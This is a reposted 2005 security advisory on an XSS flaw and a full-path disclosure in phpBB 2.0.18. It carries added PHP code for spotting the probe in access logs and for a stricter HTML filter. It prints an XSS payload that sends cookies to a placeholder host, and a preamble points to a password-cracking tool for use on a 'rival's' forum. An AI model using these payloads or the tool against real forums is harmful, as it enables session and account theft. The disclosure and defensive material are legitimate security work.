phpBB 2.0.18 XSS and Full Path Disclosure
Details: SecurityAlert
Another one is a tool, single-threaded, and it is useless. If the rival opens a phpbb or something, you can use it to run the password.
Download: http://ftpzhangxue.w205./tools/
Topic : phpBB 2.0.18 XSS and Full Path Disclosure
SecurityAlert Id : 269
SecurityRisk : Low
Remote Exploit : Yes
Local Exploit : No
Exploit Given : Yes
Credit : Maksymilian Arciemowicz
Date : 17.12.2005
Affected Software : phpBB <= 2.0.18
Advisory Text :
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from TEAM
- --- ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.
Contact with author /.
- --- 1. XSS ---
If phpBB has "Allowed HTML tags" set to "ON" (such as b, i, u, pre) and you have "Always allow HTML: YES" in your profile, or you are a Guest, then you can use these tags:
<B C=">" onmouseover="alert(’’)" X="<B "> H E L O </B>
Exploit:
<B C=">" onmouseover="alert(=’http://HOST/cookies?’+)
" X="<B "> H A L O </B>
and you have the cookies.
- --- 2. Full Path Disclosure ---
In file admin/admin_disallow.php is
- -25-31---
if( !empty($setmodules) )
{
    $filename = basename(__FILE__);
    $module['Users']['Disallow'] = append_sid($filename);
    return;
}
- -25-31---
The function append_sid() doesn't exist. And if you have:
register_globals = On
display_errors = On
Try to go:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1
- -RESULT ERROR---
Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disa
on line 28
- -RESULT ERROR---
- --- 3. Greets ---
sp3x
- --- ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: /key/
TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)
iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D
/0u14EN2sQAh1Bwu0yvT48Q=
=lsL8
-----END PGP SIGNATURE-----
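An added example (not part of the advisory and not phpBB code): one way to spot the request from section 2 in web server access logs, by flagging any request to an admin module that carries a setmodules parameter. The function name, the constructed log lines and the wider admin_*.php pattern are assumptions.

```php
<?php
// Added example; flag_setmodules_probes() is a hypothetical helper.
// Flags requests to admin/admin_*.php that carry a "setmodules" parameter,
// the request shape shown in section 2 of the advisory.
function flag_setmodules_probes(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        // Request line of a common/combined log entry: "METHOD target PROTOCOL"
        if (!preg_match('#"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"#', $line, $m)) {
            continue;
        }
        $path  = rawurldecode((string) parse_url($m[1], PHP_URL_PATH));
        $query = (string) parse_url($m[1], PHP_URL_QUERY);
        parse_str($query, $params); // URL-decodes parameter names and values
        if (preg_match('#/admin/admin_\w+\.php$#i', $path)
            && array_key_exists('setmodules', $params)) {
            $hits[] = ['client' => strtok($line, ' '), 'target' => $m[1]];
        }
    }
    return $hits;
}

// Constructed sample log lines (documentation addresses, no real traffic).
$sample = [
    '192.0.2.10 - - [17/Dec/2005:10:01:02 +0000] "GET /phpBB2/admin/index.php?pane=left HTTP/1.1" 200 5120',
    '203.0.113.7 - - [17/Dec/2005:10:02:41 +0000] "GET /phpBB2/admin/admin_disallow.php?setmodules=1 HTTP/1.1" 200 187',
    '203.0.113.7 - - [17/Dec/2005:10:02:44 +0000] "GET /forum/admin/admin_disallow.php?x=1&setmodules=1 HTTP/1.0" 200 187',
    '192.0.2.10 - - [17/Dec/2005:10:03:15 +0000] "GET /phpBB2/viewtopic.php?t=42 HTTP/1.1" 200 20480',
];

foreach (flag_setmodules_probes($sample) as $hit) {
    echo $hit['client'], ' requested ', $hit['target'], PHP_EOL;
}
```

With register_globals on, the variable can also arrive in a POST body or a cookie, which access logs do not record, so this check complements display_errors = Off rather than replacing it.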
Oh, by the way, I guess this is probably what the first one means:
Personal signature:
The personal signature you fill out is automatically attached to the bottom of your published article. Personal signatures have a limit of 512 characters.
Disable HTML tags
Allowed style tags
Allow expression icon
Find "Allow HTML tags"
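An added example (not from the advisory and not phpBB's code): the test string from section 1 run through a simplified filter that ends a tag at the first ">", and through a stricter one that escapes everything and re-enables only attribute-free b, i, u and pre tags. Both function names and the simplified model of the weak filter are assumptions.

```php
<?php
// Added example; both filters are hypothetical, not phpBB functions.
const ALLOWED_TAGS = ['b', 'i', 'u', 'pre']; // the tags named in the advisory

// Weak model (assumed): a tag is whatever sits between '<' and the first '>',
// accepted when its name is allowed and that span holds no on*= handler.
function naive_filter(string $msg): string
{
    $names = implode('|', ALLOWED_TAGS);
    return preg_replace_callback('#<[^>]*>#', function (array $m) use ($names) {
        $ok = preg_match('#^</?(?:' . $names . ')[\s>]#i', $m[0])
            && !preg_match('#\bon\w+\s*=#i', $m[0]);
        return $ok ? $m[0] : htmlspecialchars($m[0], ENT_QUOTES, 'UTF-8');
    }, $msg);
}

// Strict form: escape the whole message, then turn back only exact,
// attribute-free allowed tags. Quotes and '>' in user input stay inert.
function strict_filter(string $msg): string
{
    $safe  = htmlspecialchars($msg, ENT_QUOTES, 'UTF-8');
    $names = implode('|', ALLOWED_TAGS);
    return preg_replace_callback('#&lt;(/?)(' . $names . ')&gt;#i', function (array $m) {
        return '<' . $m[1] . strtolower($m[2]) . '>';
    }, $safe);
}

// Test string from section 1 of the advisory (empty alert argument).
$payload = <<<'HTML'
<B C=">" onmouseover="alert('')" X="<B "> H E L O </B>
HTML;

// The weak model splits the tag at the '>' inside C=">" and returns the input
// unchanged, so a browser still sees one <B> element with an onmouseover handler.
var_dump(naive_filter($payload) === $payload);

// The strict filter leaves no opening tag for the handler to attach to.
echo strict_filter($payload), PHP_EOL;
echo strict_filter('<b>bold</b> and <pre>code</pre>'), PHP_EOL;
```

The strict filter can still emit an unmatched closing tag, which cannot run script but may affect layout, so a production filter should also balance the tags it re-enables.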